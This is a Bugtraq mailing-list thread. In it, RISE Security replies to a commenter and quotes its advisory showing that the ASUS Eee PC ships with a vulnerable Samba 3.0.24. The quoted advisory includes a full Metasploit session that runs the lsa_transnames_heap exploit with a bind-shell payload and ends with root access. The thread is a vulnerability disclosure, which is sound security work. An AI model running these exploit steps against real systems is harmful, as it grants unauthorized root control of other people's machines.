Re: RE: ASUS Eee PC rooted out of the box
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
Considering that there are not updates available for Samba on ASUS Eee
PC (it runs a modified version o Samba as far as we know, smb protocol
is only partially supported), and even considering the fact that it is
Linux and not Microsoft Windows (the main reason that made us write this
blog post), we think it is not the same scenario.
Best regards,
RISE Security
Bug traq wrote:
> I bought a new beautiful ACER with windows XP... the first thing i looked at
> is the Windows XP SP2 without upgrades ... o my fucking GOD... i can exploit
> it with metasploit !!!!!!!!! i dont believe ... lets upgrade ?? ok ... no
> more exploitation
> :(
>
> You see ... is the same scenario :)
>
> lol
>
>
> -----Original Message-----
> From: RISE Security [mailto:advisories@xxxxxxxxxxxxxxxx]
> Sent: Friday, February 08, 2008 2:47 PM
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: ASUS Eee PC rooted out of the box
>
> We recently acquired an ASUS Eee PC (if you want to know more about it,
> a lot of reviews are available on internet). The first thing we did when
> we put our hands at the ASUS Eee PC was to test its security. The ASUS
> Eee PC comes with a customized version of Xandros operating system
> installed, and some other bundled software like Mozilla Firefox, Pidgin,
> Skype and OpenOffice.org.
>
> Analysing the running processes of the ASUS Eee PC, the first thing that
> caught our attention was the running smbd process (the sshd daemon was
> started by us, and is not enabled by default).
>
>
> eeepc-rise:/root> ps -e
> PID TTY TIME CMD
> 1 ? 00:00:00 fastinit
> 2 ? 00:00:00 ksoftirqd/0
> 3 ? 00:00:00 events/0
> 4 ? 00:00:00 khelper
> 5 ? 00:00:00 kthread
> 25 ? 00:00:00 kblockd/0
> 26 ? 00:00:00 kacpid
> 128 ? 00:00:00 ata/0
> 129 ? 00:00:00 ata_aux
> 130 ? 00:00:00 kseriod
> 148 ? 00:00:00 pdflush
> 149 ? 00:00:00 pdflush
> 150 ? 00:00:00 kswapd0
> 151 ? 00:00:00 aio/0
> 152 ? 00:00:00 unionfs_siod/0
> 778 ? 00:00:00 scsi_eh_0
> 779 ? 00:00:00 scsi_eh_1
> 799 ? 00:00:00 kpsmoused
> 819 ? 00:00:00 kjournald
> 855 ? 00:00:00 fastinit
> 857 ? 00:00:00 sh
> 858 ? 00:00:00 su
> 859 tty3 00:00:00 getty
> 862 ? 00:00:00 startx
> 880 ? 00:00:00 xinit
> 881 tty2 00:00:06 Xorg
> 890 ? 00:00:00 udevd
> 952 ? 00:00:00 ksuspend_usbd
> 953 ? 00:00:00 khubd
> 1002 ? 00:00:00 acpid
> 1027 ? 00:00:00 pciehpd_event
> 1055 ? 00:00:00 ifplugd
> 1101 ? 00:00:00 scsi_eh_2
> 1102 ? 00:00:00 usb-storage
> 1151 ? 00:00:00 icewm
> 1185 ? 00:00:01 AsusLauncher
> 1186 ? 00:00:00 icewmtray
> 1188 ? 00:00:01 powermonitor
> 1190 ? 00:00:00 minimixer
> 1191 ? 00:00:00 networkmonitor
> 1192 ? 00:00:00 wapmonitor
> 1193 ? 00:00:00 x-session-manag
> 1195 ? 00:00:00 x-session-manag
> 1200 ? 00:00:00 x-session-manag
> 1201 ? 00:00:00 dispwatch
> 1217 ? 00:00:00 cupsd
> 1224 ? 00:00:00 usbstorageapple
> 1234 ? 00:00:00 kondemand/0
> 1240 ? 00:00:00 portmap
> 1248 ? 00:00:00 keyboardstatus
> 1272 ? 00:00:00 memd
> 1279 ? 00:00:00 scim-helper-man
> 1280 ? 00:00:00 scim-panel-gtk
> 1282 ? 00:00:00 scim-launcher
> 1297 ? 00:00:00 netserv
> 1331 ? 00:00:00 asusosd
> 1476 ? 00:00:00 xandrosncs-agen
> 1775 ? 00:00:00 dhclient3
> 2002 ? 00:00:00 nmbd
> 2004 ? 00:00:00 smbd
> 2005 ? 00:00:00 smbd
> 2322 ? 00:00:00 sshd
> 2345 ? 00:00:00 sshd
> 2356 pts/0 00:00:00 bash
> 2362 pts/0 00:00:00 ps
> eeepc-rise:/root>
>
>
> Retrieving the the smbd version, we discovered that it runs a vulnerable
> version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit
> we published earlier last year.
>
>
> eeepc-rise:/root> smbd --version
> Version 3.0.24
> eeepc-rise:/root>
>
>
> With this information, we ran our exploit against the ASUS Eee PC using
> the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
> Debian based).
>
>
> msf > use linux/samba/lsa_transnames_heap
> msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
> RHOST => 192.168.50.10
> msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
> PAYLOAD => linux/x86/shell_bind_tcp
> msf exploit(lsa_transnames_heap) > show targets
>
> Exploit targets:
>
> Id Name
> -- ----
> 0 Linux vsyscall
> 1 Linux Heap Brute Force (Debian/Ubuntu)
> 2 Linux Heap Brute Force (Gentoo)
> 3 Linux Heap Brute Force (Mandriva)
> 4 Linux Heap Brute Force (RHEL/CentOS)
> 5 Linux Heap Brute Force (SUSE)
> 6 Linux Heap Brute Force (Slackware)
> 7 DEBUG
>
>
> msf exploit(lsa_transnames_heap) > set TARGET 1
> TARGET => 1
> msf exploit(lsa_transnames_heap) > exploit
> [*] Started bind handler
> [*] Creating nop sled....
> ...
> [*] Trying to exploit Samba with address 0x08415000...
> [*] Connecting to the SMB service...
> [*] Binding to
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
> [*] Bound to
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
> [*] Calling the vulnerable function...
> [+] Server did not respond, this is expected
> [*] Command shell session 1 opened (192.168.50.201:33694 ->
> 192.168.50.10:4444)
> msf exploit(lsa_transnames_heap) > sessions -i 1
> [*] Starting interaction with 1...
>
> uname -a
> Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
> GNU/Linux
> id
> uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
>
>
> Easy to learn, Easy to work, Easy to root.
>
>
> The original blog post and more information can be found in our
> website at http://risesecurity.org/.
>
> Best regards,
> RISE Security
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
iD8DBQFHrK6ShFjK78TGSUERAs43AJ4tM1eo5bZhdO9GgMbZhuGEWl5uYACeLHpe
FJidpsyWDBktb6rCNp3b520=
=TQQu
-----END PGP SIGNATURE-----